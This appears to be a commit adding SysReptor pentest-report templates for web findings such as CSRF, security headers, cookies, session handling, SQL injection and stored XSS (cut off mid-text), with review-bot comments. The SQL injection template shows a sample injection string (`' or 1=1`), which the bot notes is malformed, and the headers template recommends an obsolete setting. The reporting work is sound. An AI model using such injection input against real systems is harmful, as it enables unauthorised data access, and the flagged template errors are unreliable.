[[report_preview_data.findings]]
title = "Demo Finding Medium"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "e685494a-ada0-47cd-aeac-a82dd8fb7dae"
references = []
retest_notes = """
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Reiciendis culpa numquam incidunt eius non natus quos nemo, aspernatur magni praesentium laboriosam illum minima perferendis vero perspiciatis eum nisi. Corporis perspiciatis repudiandae at dolore quo facere, iste earum minima?
Veritatis architecto nihil officiis optio fugit ducimus eveniet commodi tempora perspiciatis, dicta esse voluptatibus expedita officiis, facere perspiciatis id quos animi consequuntur sit nobis similique a nostrum optio, ipsa architecto corrupti est vitae. Quo qui deserunt ea odio exercitationem nobis suscipit illum, ipsam voluptatibus labore impedit vitae aliquid tempora iusto culpa repellat vel sed? Neque iste expedita vero, enim quae corrupti error rerum voluptas cumque autem quasi quia?
"""
retest_status = "open"
affected_components = []
short_recommendation = "maxime illo"
[[report_preview_data.findings]]
title = "Demo Finding Low"
cvss = "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "cd3c3719-8536-43d4-878a-cdb9dc842b70"
references = []
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Info"
cvss = "n/a"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "e899b5cf-83d2-48bf-8838-9899246b67fc"
references = [
"https://example.com",
]
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[assets]]
id = "4c177804-df1c-412f-9e24-d990273029b5"
name = "LICENSE"
[[assets]]
id = "d818fe93-5621-446e-9c20-c8cb1999e3ff"
name = "header-logo.png"
[[assets]]
id = "a8ad4ea9-e13a-4ffd-88c3-e70164f23ef9"
name = "logo-transparent.png"
[[assets]]
id = "3c7d06af-2d0d-481f-83d7-dd7113e6a6d9"
name = "background.svg"


@ -0,0 +1,106 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,59 @@
format = "templates/v2"
id = "d6919eb0-0e69-4968-ba99-4c8a8ee108a9"
tags = [
"web",
]
images = []
[[translations]]
id = "9a165150-d953-47e2-8857-ce40443c7ef9"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Cross-Site Request Forgery (CSRF)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
summary = """
The web application was vulnerable to Cross-Site Request Forgery (CSRF).
CSRF is an attack that causes users to unknowingly send an HTTP request to a web application to which they are currently authenticated.
Attackers can thereby partially bypass a web browser's same-origin policy and perform state-changing actions in the context of an affected user.
Depending on the nature of the action, the attacker can gain complete control over the user's account.
If the user account is administrative, CSRF may also be able to compromise the entire web application.
"""
description = """
We identified a CSRF vulnerability in the web application, allowing them to perform actions in the context of another user.
**TODO: technical description**
Cross-site request forgery (CSRF) is a web security vulnerability in which an attacker can trick an authenticated user into unknowingly sending a state-changing HTTP request to the vulnerable web application.
In CSRF, an attacker assumes the victim's identity and access privileges to perform unwanted actions (e.g., change email address) on their behalf.
Without appropriate CSRF protection, the web application has no way to distinguish between a request prepared by the attacker and a legitimate request from the victim.
Several prerequisites must be in place for a CSRF attack to take place.
First, there must be an action in the web application that is relevant to an attacker and makes sense to exploit.
For example, this could be a privileged action, such as changing a user's access permissions or changing a password.
Another requirement is that there is no other mechanism besides cookie-based authentication to distinguish HTTP requests from different users.
If the user is authenticated and thus has a valid session cookie, the web application thus has no way to distinguish between a malicious, subverted request from the attacker and a legitimate request from the victim.
Last, it must be ensured that actions do not require specific parameters whose values an attacker cannot determine or predict.
For example, if a user is asked to change his password, the function is not vulnerable if an attacker needs to know the value of the existing password.
A common way to exploit CSRF vulnerabilities is through phishing emails.
An attacker does this by preparing malicious links with the intention of foisting a state-changing request on the victim.
The attacker then distributes the malicious links to victims via email.
When a user opens the link in a web browser and is authenticated to it, the request is sent to the vulnerable web application.
If successful, the attack causes an action with the victim's identity and privilege level.
"""
recommendation = """
* Check if the framework has built-in CSRF protection and use it. If not, ensure that all state-changing requests contain a randomly generated CSRF token with high entropy. Also ensure that CSRF tokens are properly validated on the backend.
* Consider various additional security measures:
* For example, set the SameSite attribute for session cookies. Web browsers decide whether to include cookies in cross-site requests based on this attribute.
* Use Custom Request Headers. By default, the browser's same-origin policy restricts JavaScript from submitting cross-site requests with custom request headers.
* For highly sensitive actions, user interactions such as CAPTCHAs, one-time tokens, re-authentication, etc. can also be considered as additional CSRF protection.
* Detailed information and assistance on how to prevent CSRF vulnerabilities can be found in the linked Cross-Site Request Forgery Cheat Sheet from OWASP.
"""
short_recommendation = "Make sure that randomly generated CSRF tokens with high entropy are included in all state-changing HTTP requests and validated in the backend."
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html",
]
affected_components = []
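Review bot: The first sentence of `description` says "allowing them to perform actions in the context of another user" before any attacker has been mentioned, so "them" has no referent; `We identified a CSRF vulnerability in the web application that allows attackers to perform actions in the context of another user.` reads cleanly. In `recommendation`, the three bullets after "Consider various additional security measures:" appear at the same level as their parent in this view; if the file really has no indentation there, they should be nested so the report renders them as sub-items. The SameSite bullet would also be more useful if it named the intended values (`Lax` or `Strict`), since a cookie set with `SameSite=None` is still sent on cross-site requests.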


@ -0,0 +1,80 @@
format = "templates/v2"
id = "904173c8-3b5d-4c77-8215-7215f43b61cb"
tags = [
"web",
]
images = []
[[translations]]
id = "9a2703b6-7f81-4f33-8e3d-42136f41f71c"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Incorrectly configured HTTP security headers"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
summary = """
The web application did not have important HTTP security headers set or they were configured insecurely.
HTTP security headers are a good way to increase the security of a web application.
They can help make vulnerabilities such as cross-site scripting, clickjacking, information disclosure, and others more difficult or even prevent them altogether.
Without proper HTTP security headers, the potential attack surface of a web application is larger and makes it easier for an attacker to exploit client-side vulnerabilities.
"""
description = """
We checked the HTTP security headers of the examined web application.
The following table provides an overview of which headers were set correctly and which were not:
| Host | Content-Security Policy (CSP) | Referrer-Policy | HTTP-Strict-Transport-Security (HSTS) | X-Content-Type-Options | X-Frame-Options | Permissions-Policy | X-XSS-Protection |
|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| TODO | - | - | - | - | - | - |
Modern browsers support several HTTP security headers that can increase the security of web applications against client-side vulnerabilities such as clickjacking, cross-site scripting, and other common attacks.
HTTP Security headers are response headers that specify whether and which security measures should be enabled or disabled in the web browser.
These HTTP headers are exchanged between a browser and a server and specify the security-related details of HTTP communication.
Below is a brief description and overview of the most important current HTTP security headers:
* **Content Security Policy**.
The Content Security Policy (CSP) HTTP header allows fine-grained control over what resources a browser is allowed to obtain resources from.
The CSP header is a very effective measure to prevent the exploitation of cross-site scripting (XSS) vulnerabilities.
* **Referrer Policy**.
The `Referrer-Policy` header determines how and when browsers transmit the HTTP Referer (sic) header.
In the Referer header, a browser informs a target page about the origin of an HTTP request, for example, when a user navigates to a specific page via a link or loads an external resource.
* **HTTP Strict Transport Security (HSTS)**.
With the HSTS header, a web page instructs the browser to connect only over HTTPS.
All unencrypted HTTP requests are transparently redirected in the process.
TLS and certificate-related errors are also handled more strictly by preventing users from bypassing the error page.
* **X-Content-Type-Options**.
The `X-Content-Type-Options` header specifies that browsers will only load scripts and stylesheets if the server specifies the correct MIME type.
Without this header, there is a risk of MIME sniffing.
This means that browsers will misrecognize files as scripts and stylesheets, which could lead to XSS attacks.
* **X-Frame-Options**
`X-Frame-Options` are used to determine if and in which form the web page can be embedded in an iframe.
Clickjacking is a viable attack that can exploit such embedding in an `iframe`.
In such an attack, an attacker overlays the rendering of a legitimate page to then cause users to perform seemingly innocuous interactions (e.g., mouse clicks and/or keystrokes).
* **Permissions policy**
Permissions policy allows web developers to selectively enable, disable, and modify the behavior of certain features and APIs in the browser.
`Permissions-Policy` is similar to Content Security Policy, but controls specific functions of the browser rather than security behavior.
* **X-XSS-Protection**
`X-XSS-Protection` is a feature that prevents pages from loading when a browser detects Reflected Cross-Site Scripting (XSS) attacks.
This header is obsolete when using modern browsers, provided that a secure content security policy has been defined.
"""
recommendation = """
* Do not allow the web page to be included in a frame. Set `X-Frame-Options: DENY` for this. Alternatively you can restrict this setting to the same-origin with `X-Frame-Options: SAMEORIGIN`.
* Set the header `X-XSS-Protection` explicitly with `X-XSS-Protection: 1; mode=block`.
* Prevent the browser from guessing the MIME type based on the content of the resource. Sets the `X-Content-Type-Options` header with the `nosniff` option.
* Restrict the `referrer policy` to prevent potentially sensitive information from being exposed to third party sites. You should define the header as follows: `Referrer-Policy: strict-origin-when-cross-origin`.
* Configure the `Strict-Transport-Security` header so that your web application can only be accessed over a secured HTTPS connection. You should set the header like this: `Strict-Transport-Security: max-age=63072000; includeSubDomains; preload`.
* If possible, define a Content Security Policy (CSP) for your web application CSP is an additional security measure that can make it much more difficult to exploit client-side vulnerabilities. Details on how to configure it securely can be found in the resources.
* Restrict the use of sensitive browser features such as the camera, microphone or speaker using 'Permissions Policy' headers.
"""
short_recommendation = "Follow best practices recommendations for configuring HTTP security headers and implement them for your web application if possible."
references = [
"https://infosec.mozilla.org/guidelines/web_security#content-security-policy",
]
affected_components = []
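Review bot: The `recommendation` bullet that tells the reader to set `X-XSS-Protection: 1; mode=block` contradicts the `description` in the same template, which calls that header obsolete. Current OWASP and MDN guidance is to not enable the legacy browser XSS filter, because modern browsers have dropped it and in older ones it could itself introduce problems. I would change the bullet to `* Do not rely on the legacy X-XSS-Protection filter; set "X-XSS-Protection: 0" or omit the header, and use a Content Security Policy instead.` The placeholder table row `| TODO | - | - | - | - | - | - |` has seven cells under an eight-column header and needs one more `- |`. The HSTS bullet presents `preload` as the default, although preloading is hard to undo and applies to every subdomain, so it should be worded as an optional step taken once HTTPS works everywhere.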


@ -0,0 +1,54 @@
format = "templates/v2"
id = "9ede86cb-9c01-4b91-93f9-0464bc830321"
tags = [
"web",
"hardening",
]
images = []
[[translations]]
id = "e7472db6-2b8f-4103-9db8-568674cd29c8"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Insecure HTTP cookies"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
summary = """
The issued HTTP cookies of the web application did not have the _HttpOnly_ and/or the _Secure_ cookie attribute set.
If the _HttpOnly_ attribute is not set, the affected cookie can be read or modified client-side using JavaScript.
If the _Secure_ attribute is not set, browsers also send the cookie over unencrypted HTTP connections.
Insecurely configured cookies such as session cookies expand the potential attack surface of a web application.
They make it easier for an attacker to exploit client-side vulnerabilities such as cross-site scripting (XSS) or compromise sessions by trivially intercepting cookies.
"""
description = """
HTTP is a stateless protocol, which means that it cannot distinguish requests from different users without an additional mechanism.
To address this problem, it requires a session mechanism.
The most commonly used mechanism for managing HTTP sessions in browsers is cookie storage.
An HTTP cookie is a small record that a server sends to a user's web browser.
The browser can store the cookie and send it back to the same server for subsequent requests.
This can be used to implement sessions for the stateless HTTP protocol.
An HTTP cookie can be used to distinguish requests from different users and to keep users logged in.
Cookies thus represent a frequent target for attackers.
A web application should therefore harden the configuration of all sensitive cookies.
This can be achieved by setting the _Secure_ and _HttpOnly_ cookie attributes.
A cookie with the _Secure_ attribute will only be sent to the server over HTTPS connections and never over an unsecured HTTP connection.
A cookie with the _HttpOnly_ attribute set is inaccessible to JavaScript and thus helps mitigate cross-site scripting (XSS) attacks.
If an attacker is able to tap sensitive cookies such as session cookies, the attacker could take over user accounts and perform actions in the context of affected users.
An attacker may also be able to gain complete control over all web application functions and data if they take over a user account with privileged access.
We reviewed the set attributes of sensitive HTTP cookies of the web application. The following table provides an overview of the set attributes:
| Cookie | Secure | HttpOnly |
|:---:|:---:|:---:|
| TODO | - |
"""
recommendation = """
* Set the _Secure_ attribute for sensitive cookies. This attribute instructs a browser to send the cookie only over an encrypted HTTPS connection to prevent session ID disclosure through man-in-the-middle attacks.
* If possible, also set the _HttpOnly_ attribute for sensitive cookies. This attribute prevents the cookie from being accessed client-side via JavaScript. This can make session hijacking by XSS attacks more difficult.
"""
short_recommendation = "Make sure that the configuration of all sensitive cookies is hardened and thus important cookie attributes like HttpOnly or Secure are set."
references = []
affected_components = []
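Review bot: The placeholder row of the attribute table in `description`, `| TODO | - |`, has two cells under the three-column header `| Cookie | Secure | HttpOnly |`, so reports built from this template start with a malformed table; it should be `| TODO | - | - |`. `references` is empty here, while the CSRF template in this commit cites its OWASP cheat sheet; `"https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"` would give readers the matching source for cookie attributes. The recommendation covers _Secure_ and _HttpOnly_ only; a short bullet on the `SameSite` attribute would keep it consistent with the CSRF template, which already recommends it for session cookies.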


@ -0,0 +1,41 @@
format = "templates/v2"
id = "e5f017ed-75ee-49c0-8e14-0f46ca606dc1"
tags = [
"web",
]
images = []
[[translations]]
id = "30ef53c4-3aee-4a8e-9099-4313f466b672"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Disclosure of sensitive data in URL parameters"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
summary = """
The web application sent sensitive data as URL parameters in HTTP requests.
Data sent as URL parameters is stored in the browser cache and can potentially appear in various other places such as web server logs, referer headers or shared systems.
Third parties could thus gain access to this sensitive data.
"""
description = """
The application sent sensitive data in the URL parameter ''TODO'.
**TODO: technical description**
This could expose the data in the following places:
* Referer Header
* Web Logs
* Shared Systems
* Browser History
* Browser Cache
* Shoulder Surfing
"""
recommendation = """
* The application should send all sensitive data in the body of an HTTP message, e.g. in the body of a POST request.
* Furthermore, the transmission should be secured via encrypted communication via HTTPS.
"""
short_recommendation = "To protect sensitive data from access by third parties, it should be sent in the body of an HTTP message, e.g. via POST request."
references = []
affected_components = []
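Review bot: The placeholder in `description` has unbalanced quotes (`''TODO'`), which will be carried verbatim into every finding created from this template; it should read `The application sent sensitive data in the URL parameter 'TODO'.`. The recommendation could also cover the leak paths the description itself lists: a bullet such as `* Set a restrictive Referrer-Policy (e.g. no-referrer or same-origin) and make sure query strings with sensitive data are not written to web server or proxy logs.` addresses the Referer header and log exposure. The second recommendation bullet repeats "via" (`secured via encrypted communication via HTTPS`); `secured by using HTTPS` is enough.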


@ -0,0 +1,38 @@
format = "templates/v2"
id = "ad8385a7-9a58-41a5-937f-6e5f1bfef9e4"
tags = [
"web",
"hardening",
"external",
"config",
]
images = []
[[translations]]
id = "3aeab6d6-b2e5-4905-b43b-f92a8432ac85"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Session management weaknesses"
cvss = "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
summary = """
We were able to identify weaknesses in the web application's session management.
The users' sessions were usable without time restrictions and therefore did not require re-authentication at any time.
People with access to a computer system could exploit this situation if another user had not explicitly logged out of the application beforehand.
"""
description = """
We could determine that user sessions were usable without time restrictions.
This could allow attackers to take over user sessions that were not explicitly logged out beforehand.
This could be possible, for example, by allowing a third person to operate a user's computer in which a session is still active.
In addition, it could be possible for attackers to reuse session tokens when they become known (e.g. via log files; locally or on proxy servers, etc.).
"""
recommendation = """
* User sessions in web applications should time out automatically after a certain period of inactivity.
* Depending on the criticality of the user authorization and the application, the timeout could be approximately between one hour and one day.
"""
short_recommendation = "Users should be logged out automatically after a certain period of inactivity."
references = []
affected_components = []
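Review bot: The recommendation only asks for an inactivity timeout, yet the description also names reuse of session tokens that became known through log files or proxies, and an idle timeout does not bound a token that is kept active. Consider adding `* Enforce an absolute session lifetime as well, and invalidate the session on the server when the user logs out.` to `recommendation`. The upper end of the suggested range (one day of inactivity) is generous for privileged accounts, so a shorter example for administrative sessions would help readers apply the criticality wording already in that bullet. `references` is empty here while sibling templates link an OWASP cheat sheet; `https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html` would fit.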


@ -0,0 +1,79 @@
format = "templates/v2"
id = "b2d2ed06-b305-401f-88a6-369083d0ac46"
tags = [
"web",
]
images = []
[[translations]]
id = "d20f4ab3-0588-4f69-8339-ef84101753d9"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "SQL Injection (SQLi)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
summary = """
The web application processed user input in an insecure manner and was thus vulnerable to SQL injection.
In an SQL injection attack, special input values in the web application are used to influence the application's SQL statements to its database.
Depending on the database used and the design of the application, this may make it possible to read and modify the data stored in the database, perform administrative actions (e.g., shut down the DBMS), or in some cases even gain code execution and the accompanying complete control over the vulnerable server.
"""
description = """
We identified an SQL injection vulnerability in the web application and were able to access stored data in the database as a result.
**TODO: technical description**
SQL Injection is a common server-side vulnerability in web applications.
It occurs when software developers create dynamic database queries that contain user input.
In an attack, user input is crafted in such a way that the originally intended action of an SQL statement is changed.
SQL injection vulnerabilities result from an application's failure to dynamically create database queries insecurely and to properly validate user input.
They are based on the fact that the SQL language basically does not distinguish between control characters and data characters.
In order to use a control character in the data part of an SQL statement, it must be encoded or escaped appropriately beforehand.
An SQL injection attack is therefore essentially carried out by inserting a control character such as `'` (single apostrophe) into the user input to place new commands that were not present in the original SQL statement.
A simple example will demonstrate this process.
The following SELECT statement contains a variable userId.
The purpose of this statement is to get data of a user with a specific user id from the Users table.
```python
sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + userId;
```
An attacker could now use special user input to change the original intent of the SQL statement.
For example, he could use the string `' or 1=1` as user input.
In this case, the application would construct the following SQL statement:
```python
sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + ' or 1=1;
```
Instead of the data of a user with a specific user ID, the data of all users in the table is now returned to the attacker after executing the statement.
This gives an attacker the ability to control the SQL statement in his own favor.
There are a number of variants of SQL injection vulnerabilities, attacks and techniques that occur in different situations and depending on the database system used.
However, what they all have in common is that, as in the example above, user input is always used to dynamically construct SQL statements.
Successful SQL injection attacks can have far-reaching consequences.
One would be the loss of confidentiality and integrity of the stored data.
Attackers could gain read and possibly write access to sensitive data in the database.
SQL injection could also compromise the authentication and authorization of the web application, allowing attackers to bypass existing access controls.
In some cases, SQL injection can also be used to gain code execution, allowing an attacker to gain complete control over the vulnerable server.
"""
recommendation = """
* Use prepared statements throughout the application to effectively avoid SQL injection vulnerabilities. Prepared statements are parameterized statements and ensure that even if input values are manipulated, an attacker is unable to change the original intent of an SQL statement.
* Use existing stored procedures by default where possible. Typically, stored procedures are implemented as secure parameterized queries and thus protect against SQL injections.
* Always validate all user input. Ensure that only input that is expected and valid for the application is accepted. You should not sanitize potentially malicious input.
* To reduce the potential damage of a successful SQL Injection attack, you should minimize the assigned privileges of the database user used according to the principle of least privilege.
* For detailed information and assistance on how to prevent SQL Injection vulnerabilities, see OWASP's linked SQL Injection Prevention Cheat Sheet.
"""
short_recommendation = """\
Make sure that Prepared Statements and Stored Procedures (where possible) are used throughout the application. \
This prevents the originally intended action of an SQL statement from being manipulated by an attacker.\
"""
references = [
"https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet",
]
affected_components = [
"TODO: affected component",
]
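Review bot: The worked example in `description` does not hold together: the query concatenates `userId` without surrounding quotes, so the input `' or 1=1` would produce a syntax error rather than the tautology the text describes, and the second snippet (`' + ' or 1=1;`) is not a well-formed string. Either quote the value in the first snippet or use an input that fits the unquoted context, and show the resulting statement as SQL rather than in a `python` fence. The sentence `result from an application's failure to dynamically create database queries insecurely` is inverted; `SQL injection vulnerabilities result from building database queries dynamically from user input without proper validation.` reads as intended. In `recommendation`, stored procedures only protect when they do not assemble dynamic SQL themselves, which deserves a qualifying clause, and `You should not sanitize potentially malicious input.` should say that such input is to be rejected instead. The reference uses the old `www.owasp.org/index.php` wiki address while the sibling templates link to `cheatsheetseries.owasp.org`; `https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html` is the current location.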


@ -0,0 +1,55 @@
format = "templates/v2"
id = "30590c34-f04c-4817-8a1b-317c4044c540"
tags = [
"web",
]
images = []
[[translations]]
id = "a06c073d-3d04-492f-a516-e453b982b4c6"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Stored Cross-Site Scripting (XSS)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"
summary = """
At the time of testing, the web application stored user input unchecked and later included it in HTTP responses in an insecure manner.
It was thus vulnerable to stored cross-site scripting (XSS) attacks.
Exploitation of Stored XSS vulnerabilities does not require user interaction, making them more dangerous than Reflected XSS vulnerabilities.
"""
description = """
We were able to identify a stored XSS vulnerability in the web application during testing.
Due to incorrect validation and encoding of data, we were able to inject malicious scripts into the web application and store them persistently.
**TODO: technical description**
Cross-site scripting (XSS) is a common web security vulnerability where malicious scripts can be injected into web applications due to insufficient validation or encoding of data.
In XSS attacks, attackers embed JavaScript code in the content delivered by the vulnerable web application.
The goal in stored XSS attacks is to place script code on pages visited by other users.
Simply visiting the affected subpage is enough for the script code to be executed in the victim's web browser.
For an attack, malicious scripts are injected into the web application by the attacker and stored and included in subsequent HTTP responses of the application.
The malicious script is ultimately executed in the victim's web browser and can potentially access cookies, session tokens or other sensitive information.
